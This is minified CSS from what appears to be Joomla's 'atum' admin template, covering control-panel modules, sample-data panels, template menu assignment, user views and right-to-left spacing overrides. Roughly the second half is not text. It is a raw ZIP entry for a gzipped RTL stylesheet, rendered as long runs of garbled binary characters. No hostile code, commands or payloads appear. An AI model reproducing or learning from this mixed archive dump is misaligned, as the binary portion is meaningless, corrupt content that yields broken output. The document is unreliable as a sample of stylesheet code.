.form-group:nth-child(19){flex:0 0 100%;max-width:100%}.com-cpanel-help .list-group-item,.com-cpanel-system .list-group-item,.cpanel-add-module-icon-help .list-group-item,.cpanel-add-module-icon-system .list-group-item{padding:0}.com-cpanel-help .list-group-item a,.com-cpanel-system .list-group-item a,.cpanel-add-module-icon-help .list-group-item a,.cpanel-add-module-icon-system .list-group-item a{display:block;padding:.75rem 1rem}.com-cpanel-help__header,.cpanel-add-module-icon-help__header{color:var(--template-special-color)}.com-cpanel-help a,.cpanel-add-module-icon-help a{color:var(--template-link-color)}.com-cpanel-help .h2,.com-cpanel-help h2,.cpanel-add-module-icon-help .h2,.cpanel-add-module-icon-help h2{font-size:1rem}.com-cpanel-system,.cpanel-add-module-icon-system{-webkit-column-count:4;-moz-column-count:4;column-count:4}.com-cpanel-system__category,.cpanel-add-module-icon-system__category{margin-bottom:1.5em;page-break-inside:avoid;-webkit-column-break-inside:avoid;-moz-column-break-inside:avoid;break-inside:avoid}.com-cpanel-system__header,.cpanel-add-module-icon-system__header{color:var(--template-special-color)}.com-cpanel-system__header span,.cpanel-add-module-icon-system__header span{margin-right:5px}.com-cpanel-system a,.cpanel-add-module-icon-system a{color:var(--template-link-color)}.com-cpanel-system .h2,.com-cpanel-system h2,.cpanel-add-module-icon-system .h2,.cpanel-add-module-icon-system h2{font-size:1rem}@media (max-width:991.98px){.com-cpanel-system,.cpanel-add-module-icon-system{-webkit-column-count:2;-moz-column-count:2;column-count:2}}@media (max-width:767.98px){.com-cpanel-system,.cpanel-add-module-icon-system{-webkit-column-count:1;-moz-column-count:1;column-count:1}}.com_cpanel .content{margin-top:2rem}.com_cpanel .card p:last-child{margin-bottom:0}.com_cpanel .card .list-group,.com_cpanel .card .table{padding:0;margin-bottom:unset}.com_cpanel .card-header{display:flex;align-items:center;padding:1rem 1rem .75rem;font-weight:700;color:var(--template-bg-dark);background:var(--card-bg)}.com_cpanel .card-header>[class^=icon-],.com_cpanel .card-header>img{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.com_cpanel .card-header .btn{margin-top:.25em;margin-bottom:.25em}.com_cpanel .card-body{padding:0;overflow:hidden;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.com_cpanel .module-actions{order:1;-webkit-margin-start:auto;margin-inline-start:auto}.com_cpanel .module-actions>*{padding:0;color:var(--template-bg-dark-70)}.com_cpanel .cpanel-add-module{display:flex;flex-direction:column;align-items:flex-start;justify-content:flex-end;width:100%;min-height:130px;padding:0 1rem;font-size:.875rem;font-weight:700;line-height:1;color:hsl(var(--hue),30%,40%);background-color:hsl(var(--hue),35%,98%);border:1px solid hsl(var(--hue),35%,88%);border-radius:.25rem;transition:all .15s ease-in}.com_cpanel .cpanel-add-module:active,.com_cpanel .cpanel-add-module:focus,.com_cpanel .cpanel-add-module:hover{color:#fff;text-decoration:none;background:var(--template-bg-dark)}.com_cpanel .cpanel-add-module>span{padding:.25rem 0 1rem}.com_cpanel .cpanel-add-module .cpanel-add-module-icon{font-size:2rem;color:hsl(var(--hue),30%,40%);-webkit-margin-end:.5rem;margin-inline-end:.5rem}.cpanel-modules .list-group{border-top:1px solid hsl(var(--hue),40%,85%)}.cpanel-modules .list-group-item:hover{background:var(--toolbar-bg)}.cpanel-modules .list-group-item a{font-weight:500;text-decoration:underline}.cpanel-modules .list-group-item .btn{text-decoration:none}.cpanel-modules .list-group-item .list-group-item a>span[class*=" fa-"],.cpanel-modules .list-group-item .list-group-item a>span[class*=" icon-"],.cpanel-modules .list-group-item .list-group-item a>span[class^=fa-],.cpanel-modules .list-group-item .list-group-item a>span[class^=icon-]{display:block;padding:.5rem;color:hsla(0,0%,100%,.9);background:var(--template-link-color);box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.cpanel-modules .list-group-item .list-group-item a>span[class*=" fa-"]:hover,.cpanel-modules .list-group-item .list-group-item a>span[class*=" icon-"]:hover,.cpanel-modules .list-group-item .list-group-item a>span[class^=fa-]:hover,.cpanel-modules .list-group-item .list-group-item a>span[class^=icon-]:hover{background:var(--template-link-hover-color)}.cpanel-modules .list-group-item span.home-image[class*=" fa-"],.cpanel-modules .list-group-item span.home-image[class*=" icon-"],.cpanel-modules .list-group-item span.home-image[class^=fa-],.cpanel-modules .list-group-item span.home-image[class^=icon-]{display:inline-block;padding:0;margin:0 .85rem;font-size:.9rem;color:#010101;background:var(--white-offset);box-shadow:none;-webkit-transform:scale(1.2);transform:scale(1.2)}.cpanel-modules .h2,.cpanel-modules h2{margin-bottom:0;font-size:1rem}.cpanel-modules .mod-custom,.sample-data .list-group-item{padding:1rem}.sample-data__title{font-weight:700;color:var(--primary)}.sample-data__icon{width:1.3rem;text-align:center}.sample-data__desc{-webkit-border-start:4px solid hsl(var(--hue),50%,93%);border-inline-start:4px solid hsl(var(--hue),50%,93%);-webkit-padding-start:1rem;padding-inline-start:1rem;-webkit-margin-start:8px;margin-inline-start:8px}.com_joomlaupdate caption{caption-side:top}.new-modules .card-columns{grid-template-columns:repeat(auto-fill,minmax(240px,1fr))}.new-module{display:flex;overflow:hidden;color:hsl(var(--hue),30%,40%);background-color:hsl(var(--hue),60%,97%);border:1px solid hsl(var(--hue),50%,93%);border-radius:.25rem}.new-module *{transition:all .25s ease}.new-module-details{flex:1 0;padding:1rem}.new-module-title{margin-bottom:.25rem;font-size:1rem;font-weight:700}.new-module-caption{display:box;margin:0;overflow:hidden;font-size:.875rem;box-orient:vertical;-webkit-line-clamp:3}.new-module-link{display:flex;align-items:flex-end;justify-content:center;width:2.5rem;font-size:1.2rem;background:hsl(var(--hue),50%,93%)}.new-module-link span{margin-bottom:10px;color:hsl(var(--hue),30%,40%)}.new-module:hover .new-module-link{background:var(--template-bg-dark)}.new-module:hover .new-module-link span{color:#fff}.com_tags #fieldset-image-fulltext>div,.com_tags #fieldset-image-intro>div{grid-template-columns:1fr}@media (min-width:768px){.com_tags #fieldset-image-fulltext,.com_tags #fieldset-image-intro{display:inline-block;width:calc(50% - 15px)}}.com_tags #fieldset-image-intro{-webkit-margin-end:15px;margin-inline-end:15px}.com_tags #fieldset-image-fulltext{-webkit-margin-start:15px;margin-inline-start:15px}.tbody-icon .fa-download,.tbody-icon .icon-download{color:var(--success);border-color:var(--success)}.tbody-icon .fa-mail,.tbody-icon .icon-mail{color:var(--primary);border-color:var(--primary)}.tbody-icon .fa-delete,.tbody-icon .fa-times,.tbody-icon .icon-delete,.tbody-icon .icon-times{color:var(--danger);border-color:var(--danger)}.com_templates .menu-assignment{position:relative}.com_templates .menu-assignment .menu-links{padding-left:0;margin-top:15px;margin-left:0;-webkit-column-count:3;-moz-column-count:3;column-count:3;-webkit-column-gap:15px;-moz-column-gap:15px;column-gap:15px}@media (max-width:991.98px){.com_templates .menu-assignment .menu-links{-webkit-column-count:auto;-moz-column-count:auto;column-count:auto}}.com_templates .menu-assignment .menu-links>li{display:inline-block;width:100%;margin-bottom:15px;vertical-align:top;list-style:none;-webkit-backface-visibility:hidden;backface-visibility:hidden;page-break-inside:avoid;-webkit-column-break-inside:avoid;-moz-column-break-inside:avoid;break-inside:avoid}.com_templates .menu-assignment .menu-links-block{padding:15px;background-color:var(--card-bg);border:1px solid #dee2e6;border-radius:3px}.com_templates .menu-assignment label{display:block;padding:3px 0;font-size:inherit}.com_templates .menu-assignment label input{position:relative;-webkit-margin-end:5px;margin-inline-end:5px}.com_users.view-debuggroup thead th,.com_users.view-debuguser thead th{white-space:normal}.com_users.view-debuggroup .legend,.com_users.view-debuguser .legend{margin:1rem 1rem 0}.com_users.view-mail .form-control{max-width:100%}.com_users #fieldset-groups .controls{-webkit-margin-start:2rem;margin-inline-start:2rem}@media (prefers-reduced-motion:reduce){*,:after,:before{background-attachment:scroll!important;transition-delay:0s!important;transition-duration:.001ms!important;-webkit-animation-duration:1ms!important;animation-duration:1ms!important;-webkit-animation-delay:-1ms!important;animation-delay:-1ms!important;-webkit-animation-iteration-count:1!important;animation-iteration-count:1!important;scroll-behavior:auto!important}}.float-start{float:right!important}.float-end{float:left!important}.modal-header .btn-close{margin:-.5rem auto -.5rem -.5rem}.text-start{text-align:right!important}.text-end{text-align:left!important}.me-0{margin-left:0!important}.me-0,.me-1{margin-right:auto!important}.me-1{margin-left:.25rem!important}.me-2{margin-left:.5rem!important}.me-2,.me-3{margin-right:auto!important}.me-3{margin-left:1rem!important}.me-4{margin-left:1.5rem!important}.me-4,.me-5{margin-right:auto!important}.me-5{margin-left:3rem!important}.me-auto,.ms-0{margin-right:0!important}.me-auto,.ms-0,.ms-1{margin-left:auto!important}.ms-1{margin-right:.25rem!important}.ms-2{margin-right:.5rem!important}.ms-2,.ms-3{margin-left:auto!important}.ms-3{margin-right:1rem!important}.ms-4{margin-right:1.5rem!important}.ms-4,.ms-5{margin-left:auto!important}.ms-5{margin-right:3rem!important}.ms-auto{margin-right:auto!important;margin-left:0!important}.pe-0{padding-left:0!important}.pe-0,.pe-1{padding-right:0!important}.pe-1{padding-left:.25rem!important}.pe-2{padding-left:.5rem!important}.pe-2,.pe-3{padding-right:0!important}.pe-3{padding-left:1rem!important}.pe-4{padding-left:1.5rem!important}.pe-4,.pe-5{padding-right:0!important}.pe-5{padding-left:3rem!important}.ps-0{padding-right:0!important}.ps-0,.ps-1{padding-left:0!important}.ps-1{padding-right:.25rem!important}.ps-2{padding-right:.5rem!important}.ps-2,.ps-3{padding-left:0!important}.ps-3{padding-right:1rem!important}.ps-4{padding-right:1.5rem!important}.ps-4,.ps-5{padding-left:0!important}.ps-5{padding-right:3rem!important}.input-group:not(.has-validation)>.dropdown-toggle:nth-last-child(n+3),.input-group:not(.has-validation)>:not(:last-child):not(.dropdown-toggle):not(.dropdown-menu){border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.input-group.has-validation>.dropdown-toggle:nth-last-child(n+4),.input-group.has-validation>:nth-last-child(n+3):not(.dropdown-toggle):not(.dropdown-menu){border-top-right-radius:0;border-bottom-right-radius:0}.input-group>:not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback){margin-left:-1px;border-top-left-radius:0;border-bottom-left-radius:0;border-top-right-radius:0;border-bottom-right-radius:0}.input-group>:last-child:not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback){margin-left:-1px;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem;border-top-right-radius:0;border-bottom-right-radius:0}dl,ol,ul{padding-right:0}.dropdown-menu-end:after{right:auto;left:.9rem}.menu-collapse,.sidebar-wrapper{right:0;left:auto}.menu-collapse{margin-right:-7.5px;margin-left:0}.field-calendar{float:none}.form-text{float:right}.field-user-wrapper{float:none}.menu-badge,.menu-quicktask{float:left}#jform_new_url,#jform_old_url,#new_url{text-align:left}#jform_dbprefix{text-align:right;direction:ltr}.skip-to [role=separator]{text-align:right!important}.input-group>.custom-select:not(:last-child),.input-group>.form-control:not(:last-child),.input-group>.form-select:not(:last-child){border-top-left-radius:0;border-bottom-left-radius:0;border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.btn-group>.btn:first-child:not(.dropdown-toggle){border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.btn-group>.btn-group:not(:last-child)>.btn,.btn-group>.btn:not(:last-child):not(.dropdown-toggle){border-top-left-radius:0;border-bottom-left-radius:0;margin-left:-1px}.btn-group>.btn:last-child:not(.dropdown-toggle){border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.btn-group>.btn-group:not(:first-child),.btn-group>.btn:not(:first-child){border-top-right-radius:0;border-bottom-right-radius:0}PK!��4z�z� atum/css/template-rtl.min.css.gznu&1i���ۮ�J� �+,��sD�uق��*ta
�ꇪn�g\
J�.i�2�doa'��m^�o�O��_���qYq!��<���<�ތ+b]�VD�a�˪��o����p�f�T�N�{��*Wۧ]]f�a�nG�h4,�pU^�m�ݞޮ��f��O�~����7��b�F�/�S��*���f�A_��z]�u�:UyQ=}ͪ�G�|ܜ�B��|˪���G\�g�mQ���.-O�1<d�/ܙh��	&���]�nf������� .�o��>oN�k��v���_�z��oOQ@����8o��!|�n�"\��S�q_�ù��z��I��M�j�(����hU؜��r�bAȉ�PA��lVb٥x�4�
�s��g%GE�j��&�l�X͵���+���g�l��0kDW���>c	V��[�k1N�z&ѻ�!��NA����c8�@hC�c�#sCG���zf����St
B��)=1A�<���p�@܉�<ꢀ:���j�*�4�q�I��E�r�m�H�tֺM�%���9J�@�#��J�I��gK�y2�N̑s����I�����]��xI	q	�Jӫl}ٟ�B׋��5ǫ(��S�ʢ����6�&���D��Ύ�o�~���_N����ff�3r���F\�=��?g�%��#�4|��T����/E�����Y�_�k�f��*䘆-�������	�������_o�թD_��T�w�p:��s�.������K���Y5���X���S�>
��t�OeV�q�*�3)���?��վ�P���6�~4r��xyB4�s��?��(/�Cm,�Ӂ�q0x�i��m.E5|Z�SU�W�g4����vh�{~�á�Y��\�!��êȯ�"G�"�hIq\�;����T���e_�H�}ݽ��N��N�����Ɔ1Eȃ%����x���H�V��D�����(]R5T��F
�U����N�c.�pߊ՗�����,��
&�Cmivw�%b�z�]f�?��]uGv�&
��Aĺ�?�1��B̺�Y�YE�<!��/��Q�"������N}�9����.�v	�o�����R��t�>���#��>�Kh>qF��/�r.���(U��jLM`�2G5 ��VP�\@��?���A�<��}~�=�I��w
A<��~��`�v	�z�2�cjA<���RABJ0+w���v/���T�:Z$�)-�b%�tF�m�'�jU��g�,\��ڣr4I��/e�yH
��wI?s��xB�TTXZA����	�4�F���yi��_�g4T|A�w,��җ,�+��:u�r/��@��!+%�b6�r*���~Fx�<�,6�'<~��!-r1�T'\1x@*m=�䗻��}��9�o�/�˪<���o�ӥඍg��հ�T��VB�F��Q�(F�[ҎY����2�qґ������̋�K}E�]����V���Bp�#�Zbr�Dsf<ؕhT�o�O��.0�wgD�H�Q�0v��p���ѷC�@�5�Od�n�-���x�6>��k4֟Cs����`o֧�~Y�C4.�1�p6�8͠*
8����*脥�T��q�Q��}����'Z7���F�ޞ��,���U7%Z�e��i��B����ʔ;�wUd_���(�(BV��b�&o�����O�j��>����?AI��MZ������l��fx��V�n ��f��o��n���vX���?��,^.٪D�eg�ĐȞ�0x�P?��\�1���€�%9"#ϒ�~�~e�N��b6�I��]��Oy��|x٠)��C�/2�ku�C����\� �2[e�b�#�s�i/�+���.�6b����6 �c�u_�3����4���|�O���y�|R�!&$CJ�p|)ZWC]M!w����Eh�~�Ѭ�@m�W4_,>R��w6^�O�#����z��2��ߟw���;�B�/������vH1
�P
��ĭ�1G�r9U
ki/.�sӋ!�

tŅ���a�~c����RM�34~�%2&*�́�.c�L��W�[����7�ٴ?��lm�i�͍�Q��!!�+�u��N��e��Q��/e�EL�#�]��/ٴO�Պ�\�<���<���������ɋh�$hN�ֈ�"Dx�o���`h��"yƫ(����	�Ka.F��(���7�L$�[U'J�g,�،�x�b�\#��g�=�Ng��������f(
a����`������j2NK4l�x�8Ⱥ�%��I���^�H?sri6gD5����-�b��/xd�
�\��d�l����C�V����n8��Kv�������E*�h���!�>�&̰&�[�RW]�VYP+l�ŋ�U\�-{<Z<�b+��҅1Ѕ���A][�����p$�ك: �2Vy�]H�.����X�T�� ~�"��$�����/�#�ry��[�/��(V%
ۿF�g�jA�k�/�͆��C;6�ђ9���Oڕ�{�5�/#m]
,������'�K�:Y��D���%x+d�Ay5@'�V�Ո7x�����������
7�u�ɏ���:f{���y�82)��r�xExӏ�V��3�vo�H���F��c�X�0D�w$
n�����:̡a��폜C�r+�v����s)��\���P�Dޢ�C��K�X@I���V�S!Ӎ8�M�
��"�hşN���(fӹ���,1 \,3B;��}�z�%*Glb*xPs�	��)/G��۽U���l~�!'�-iS�K�]��Ľ2HHZv�Ɗ��P�*�I��`�ß~���Ի
�pF�E�>���xI뒱���Z����[O1NxGz�YbKb}&� ��h'�[l c�EK`�56@��,���Xab���"Tj����(�����wV�Rb�9Z:0{�A��v�.���`��c��f�.�1�w�3��3���3��gTǏ�Џ��?�۱�D���rہ�ؓ�ҏ��3�Q?>#@?>#��|���0����F���F�~�F����1�1�����fNwcu^�3�������'l���a�,���0X�ht���f�q���D��p�Xmnj.���usn�Q��f��8�����\_h�ʼnE��V,��8�hc�!���%"/V2�JdQ1�T���@�H*t&�@��K S��	d&�	E�D@,�P��6����s������o�{L�c	�o,�қXzKR7�늅7��&�IͱX3�nbѭ)��Z�V�rB�M�zMaJj�bͱPt�n��5M�qXx���4��mቸ�s�i����oO����v� |��ud���0�}����h�é!0�n#�����^����ĝ�����M�����t�~���
�L�ސ����t��1�n��ޔ�[S�&�`n
�M�I8��d 7�&��9�u2��p&���2��r�AR�t��0��\��xV���x���Y����Y�B�ӳ⥶�gŋm�gE����zV��;��zV��Y�ɳpyV"{�g%b7yV"q�g%�vzV"g�g%"vzV"]�g%�5yV*S�g��yV,���T��JoJ�)�y]�ge07�$���2��r�A��Y�M�����Y�M�� )�zVpS̞Uފ��x��ϳ�6Oϊ7��o�yzV����Y�ݳ"_ϊ@}=+uxV�f_ϊa}=+�����Y��<+��ӳ��<+��ӳa;=+��ɳ;=+��ӳ��<+��ӳRq�<k���DL�g-�j^.�5�1�k�%_��07&�x���|�&��9г�|�/�D�	�`�%_�� 7$�X@�Z���Y��w�콅�쿋����|���|���|v�h>�oj>��k>;�6�;�n>w��|���D`&�J��Z�읮����Z�ĝ����Z��M�����Z�t�����Z�L������Z�t�# bR]++�)���4�uM�������p<��@n
�Ms,�ke7�&L8�ke 7�&���Z�M��V%���[;8�.��ýv�]�����b��X'���vr��~��h�<�����ZOg��m�����z:\��u�>�u���m�.�w[�k����Z�o�~-��u�Fܺ`�n����n��[Gl�ĭ+�}�FC�o{��9��B�g�uq��b�~��]Mi}���g4�o<P�:�҂Q��-�#��(��1n!�K{�(��ꡔ��%��P��\Ng��%�f��D�Yv���O�~j��Q��*g�3������|�=?/����_�E/�Z����K��5r�T=6��7q|�T;ZDz!Q(L� z�+L�h���k �6.RKa�"M�
���-�\U�JQ@.�+�E]��I�j�c�Cy��R=�3x�M�O�}8��[�(���K]S$;�rf��@���W��-���z���7J�
�,?k��M$z�����71�ޮ��H
^�mE��y�ڬW�v[R�ƣ�]O�(߀���~�]m��~ϒD_!˘���i>��G�:[���r���q>�Am���^�$K/+�<���ɳ<�J�d]�gݨ���z݇:����7���./���f�H���zڑ�b��W�N��XG=��mq��d2q�|��6W�֋uW��W��jӍ��פq�-N�OJ��_�ж.�8ܕ�
�Pq7��bZ��F�jW}�Hk���IK��h<1�Ʈ�TI�ƫqa M�Ӓ6N��x��khgy!m��V��t��0ͯrA�����Ǜ��4<�����]�Ӟi�����P���*�[��Mg�&�C�X�E���r��&�x�0��\>�����^���ݐ^���2F��q�
Z������M6�,ڈ��F����h/F���Wo6q�+A�'d�a\�/�ij���㴤.�.�T*W6�����w���ܟ�Z6<g��]��=Krы�Q��l#���D��������t���V�����Fb��29P/K��+����X����\}C/���t,o���p$4��{��"�!a��&�j�ܤ$.�鲞i2�Ҙ$�8J��|<D�J��+[�5K�m������*V��Z=r}S��X;r�]����IE���{��P���WT�^�k�PV�Fc�9�c�x��7�H!�DoP�"c�8�O��
�v�注�l�P�/�Q��|X|E���Z��c�c۴�e%]-&z�Q�9���;&�A�p5̀|�$�lL�\I�C��kH��:�W�����N�뻥]?��.+���w�^����Š
�i:���Mh��3�L�N�W��V�.�
G��+z?��I�S�9q0�f�$�\Ʃ6��D��s����ܓtϮ��RH낏���A��c����H$s~��#'@�?z\j���W,�k���������"\���*�S%+T�5��������Ń�z+p��.���a4v},E�nn�t��Ɩ�z�
s�5	Ѷ`,o<zy�?d���Z�F�_�/�/��p��_�tU�U���@���q?�&�[Q�P��x�z
`'b�CV���c��XtD��H�t�.Ua��/�)�_��?�[����Q��}��o�7��Z!��+�(��ـ�h@5��I(�Qַ�Ȧխ���0�B����ew}E��9l4/���!Sf��m�+������9Q�M�(R?�+�_�����"������@��n���(��_��$�3�ڎ<q�0�.����]=[������eq�3}�սn{�W>#��{ǥx����|��>��H> �Y���osRk��B���w�s,r#&1�cQ��_�g�rb�gГ�7�f��(�hƣ�n���Q��¢a���C�d�~�^6�|�n�� @����r~��o߾���G�j�KE��>��/�����{Lz�����?�����ˏ���_����%cd�w�zE���ߓ^J����c�wb�ߏ����<
��`N�B�B?����뇱(���`�X��W�����U�9nRA?�y���K4"tӦ�%��}ԣס
:ū�o���R���"P�Dˁ?��w������~�1���-Q^�	��Ř���I5i��f�L�e.�Wy���ن
B<z~OR@&I?�%�ƸFDd��{���c��Z-_�Kw�V�#��6tg+4U�^�%	R�א�����%?�oö����uNl��p��]�\��cK�m�j�+t��E�ŽV&���fˆzr}�]����2��}'mr���˃�O� *��#"�II�7�+d��ۥ���8��G؃~���lƤ�}w`�R�C����]��M�+��z<�,�.rL����ǷD[��JU��7E�D�L@4.�^�Sb��oL���h��<�Upt�Y���LMmk�42i��U��M8���^�ls�}E�K��wܖ�����3����=U^�I���>E�o=�Gdx}1�A,ےT��A����X,��援sl���Q6T
�
��Tv����P�f���E�Y!�yx�L]��<o��.�x�W�%�P�hx9};�]}�����?w���>�1he��$��A^/'��|f'���ß�]�i�zƧ���a4Oԯ�`Կ}��
§��MY���}{!���⦜M�|
�g�*�B"Xsޝ	�n�S
��{�R�]�oۓI$�G^����KU\�;�>�f�R�<ҋ�U�/���b�.�wK��X[/��4�� %����EK�l�I�3�Nth+�PJ^$��r:{��%�
�J�fHAH�/G�L���ѫM4��j��_���%2/���~4k)6*X[j��I�����>��Jp�����T�LI��>�7uˇ`eX����+dL�`���la�W�s��4�n�]�^=���x0t��`
r��8^<L�f#��m&�|�\�2"퇛�ȱqI/�דxH���<�pė�	�
V�5wE�Rj~�ʈ���!͂3>�W�<]�$�'��������0k��0j��o�d�<x2T�Aq�I�8rBcӼ�I`�w%��
	z�OL���t��1�-�&'�q0��M���u8���(��&S��$�Gq8����:F���|=����}B�&3�o2����b�Q�jT��o�f�THz�s<c	�	�"r#)�LH��7��S����l�VH�Dn	L8�-����.j�0����KIt���ԑBa�<��؞r�͛l2-m��ЫF�ti"�ކ_�7��-v�oi]c~����ۖ�MGieJ�0eW��/����?̚�
{�d�a7��_��;UHI-�W�{��U�<\�!!�� �<���%��ݔm(��}�0�^�b6j�XG����1iN���7Lu}�A<?���Hh�7�4��uB��`[%�ۿ�#�t�ŧ�i�֑G����x�4�'���}�/f�I4/�K<FΟ5�
�R�Rς���c�>R�<��`��2���}@��φTd�m9ep��9���F��>�G>� 3S�2����9��Lw���h�6s�|����:���j����g�(��
e|��^6r7.�~�����?wZ>Z�X��n�P�E������s.$�jy/%���s9٧}����%�4?��\�*.�h@>KR�A>��CK+��EXJy�;���T�,O}��\���}�,R�U�6�M�TmU�q������=�Z�e&}4/�k(�)y�Ŵp��4�<�x�ZtC�'8��|^{��p�?��,�Df�Is�q>���4��Z��}��	N�u�b�n���e����$zſC��-�W�-� S�c�è���k~��2GS��K`<&��=�o�v4��#L/G;��)~yjj<J��s�I���s��0�gs�u4�� �9-fú��E w����$h%����	�=E2Dy�	��ȁ�)�8I�)��hM�S���}
+��"�RU=�G�z6���"?ۏ2.&�I�ް�M�ɴW��(BҘ�8�ى��`�NH��vM���F'����/�_Ob'1�����<�r�D����Q���/~��|��CB�AXy)ڡ���S���rV�L[Ƴ�d2�ܸ]h�O�pGV��C��.��`,���V�����x� �e(F�AF"�LZ_�4�d�`��
�V��s�(��9t{�ܠ��I� ����I�X��6�t�wh����d'h@_�6Kh��#7*酮����S�UVD��<��١��`������/�).I�I�~Z�TQ�����
p5�*�U[�
J���_D��O�ƛ_G��:Ywn��$F�Mf�?���
�.�n�`F��#����%��؃L�n���A'�j=��=�e5�f3ښ��b
?�|d_<F�l�$I�>�Q$Q��ز��hv:K���f"j@��%�`��
��v(T�L�"��w��IV�1H��S�S�d�~c�S��mv[���)�D>�� �?���|���R�%;5�r@�0A�$�l@@
��ڰd�+��S�nÁK��;����")�����&�>m�spi-y��>��O�),��腫/��'�m��}�[��&�6Ʋ�H�m:rc��������s����T�}�t�����4��X`���t�X@'�P�x��~l���^}��3�\8����u�	�C�*NMx��w�����2MiY�w��L�Pڨ�\�}jg���I��K�B��F
��,���J����Akt��	`�r�WF����i���X�]v�S�[���y6�v��l;��H�f�*��i��n�]��1Q��f��A�̢��!L�D�B��dD>-�b�z˦v��~i5��hc�"@f�bł.ц��z��b��,��g�#�큶��(|QU'g/�#u�E?,�Q�%��3p%�*R�deQ֩Y;����d1��m+%/�	j����~�%
�mfGHW��F֎;`A")�ރ�C%)=m�O���Eu�#���֨�#��G��<��j�u2�3���w��ܪ}6���+��m��V�qB�c�a�^V�ܬԉnc�Zb�*�3��P��Q�"5��/6½��@��Fꍟ�9m�eh���αJ����9�Rid��?�̆s���>}�,Q-S��L�J�L�P�4L�
��/tWkmKƤ����%q\nFK�t.{��>F�=Skfhh�g#g<�G��ǐ�I��=�ɘ+��y�[i�4*�D��״�,̮b��˜gɹ�o`��ʙu���2���J#C��n�xX�c���)ئ�dQҌ�!\�P�kM:4L�
�ێ�9ggk��Fd��q�z������++y��:�p�-�6=X��k���3��@ɉ��	�᠉4O+QA2�žơ�tv��.h`�&g��Q(y��\6��_�e׬O��!زO�G�����@\	�>�-Ő������Z(�4���k;P�gw!k��dJ��6"9�ә'W�]�g��m�v�]�GG��I���Hɒa��HO�сA�-�fd�v���4h3��P�Qo��rA��sR-�1�s���h��M��d�&�׀cO�tu�0/01��!�4��i*,D����N��U��N���0���-�<��ך�sΩ��PoӃ���p�<O�7�Xc�]1%z�8�4	-៉4�AD�4�JOW!ʭF g���� ����>�����`
��'_�&���-h_�\I�����O�-7ԣ��;>��jK��`OC5���M8{�;d�=���J�4��$���5ۮ1��d�j�w-u�uW�2�����Y�}cN�UC���>ə���b�ʎ�=�v���+uw6<0M281o�Ex����A�-ކ�'�͈SY�v^�!%�:��Z~��tM�����$l-��xh�
hǢ@�ހ�&v�"��>��F�<�D��h5��ڈ��U�J���������#
�1ꝯ�=�Յ�<���p/|�R����o��JK��Kx�erB#�v��;��;.���x����i�]���x�&�r	8
������U�튐]w��S����6�l�,���j�i'�Tv:�3v~Pya��پ��g��-���wg7Y^��β[Z�-�X�Y�}�����`�?�G\�������bZ��k�X|3���)��h���)���y^��})L0�;x��.��S�
mH~*�9���dՅ���e��o<k0O��T�Z�v<I�#E�%��+���ӛ7��\�EH5ȝʍ*����"f��n��.m����
	��$�>z��^Sj޿�a ���-�8�z͕?bB?(�Bw�woY�kT�r�O�Vk�J�??�-�O�o�&5�?ȴL3IL��l���|:����y`��P|,JehHt��ꌷ��5E5��
,DF�`G_ 戢�
4&��5�M���(��:Pu�K��E�� �o6��r�8lw�PM/�(\?�������a�Ӈjz�G��'Q�\��a��jzH�z8�	�D�+H�џH6L>��{�k�����"�����Q�\��#9D�cDG���p�Tu��g3�8a���u��f���rU��,qB��U ��E4�D�	
������8���*6���6̌��nnV����;`u ������]X��3]���,�Ɖ���u��K�S�b��%�D��'ĩ�^��
aƾ?�jY�+��f"��O�}�f��ݾl^�B���:}ߌ����b �*�Tm���樦���z��F$�%�?z=3,��9��4����m�s�V�)�b�6����ͨ�2Y�JW�z�ƾ%9L�C�>X�@�,|�fq�U\�>����HK���H�ЦlZr:�<���H�)���k��MS��7x�#H�xT�t���w��%��!�A�]�U���O��v[�5��
^)S��]�lE�k�F^ GN \]�y�=�f�)��%Hj��0g-c��^;C�� 6�(�:�f�A��}�l(u�-��(�d�o�� tw���&Ok�n�P�M���ׯ�uq	� ��H�t�7�\m���w�������q0%����R���⢰����xL:��)�x4�L�	�;���f��,���A��ŸLqq����@��2�BݐVF_C�kD>��?��#��/>U���a<��b;XKYP�c�E�p�$��̲y�0�v�!N�r"4����z��.����4"%�g�_4t���[1U��Yt2!<h�A(�w�7�I�Z�}s�m�
�ڶSA�U֑ɰ\SZ�?�Mx���H�Rj�ΰ�����N�qA���.n�i�L��B�y��\��Li���:���̃��:�;4]�6���:CG��Z��
��ǂj�ΉͰ_�SӴ�k����M��P���A��5�+#3l�����@
>�w`�F0֧8��+oB$��ʓ���l�?�ʅ��X�۶偝'���wS�]3\�<���T��vӂ�L��^��E�ӵ��7����<��|�s�wj���?�?�~���@�!m~╀
uk\P75(�bPvQűAvs�ƿR�K��k�-�p�y,1�v�љQ�Y�p�%k�H��66�<��^�LIV��	���С�(����j�}o5F�%O���9U?��g1h�8�%�Y�,�?�Z&��'��bͷ����u��f�tW���+NY�x7��iu��5�<�*n�ܖ�?@�y;
��
�#g����G�����}����iqp5i��ٛ��i�.�����̼�
Q����[�)�6�SK��Z�8��d��Bq\�U��+�e`�K�!��2Y�ؠ��3Q��@��Q��O��rV^x�hT���{�Q`�?PS&�{��������=���C0�������4�"�rƥ�3�==Fxޗ��=U���f�+��k��F��+oƵ�6�\ҊD���c�����UdM��1\e�����:��)6!�;�jд�nq�Eb��'��9;J>��4M	h"�xI�(��Q�$���˷�86�	I��&4<Q�QԛO#�%C��j��k�}�[���������\��J��Е#��p�\H~��3��E��4�5)�BɬEx���=&����\6R�ʕ9�h���;
(	>vS�v�H�U4�U�`�&��U��Y
3��� �W^�ul��Ta*b��u��$��
���n��΍rY�Gf'x��R*F��,/���i�/Ez�EL�n�7���14�>s�ө�ξ
g��ݠ
�\������i��y��֨��(6�L�^!p�pU7��������nr־���u������|�.�5�5�},#&n*�Pk����H�w��\���ꯔ���W�B�WJQ��+E~�AFTn_#�r�Q�r��RT��R�2:_)
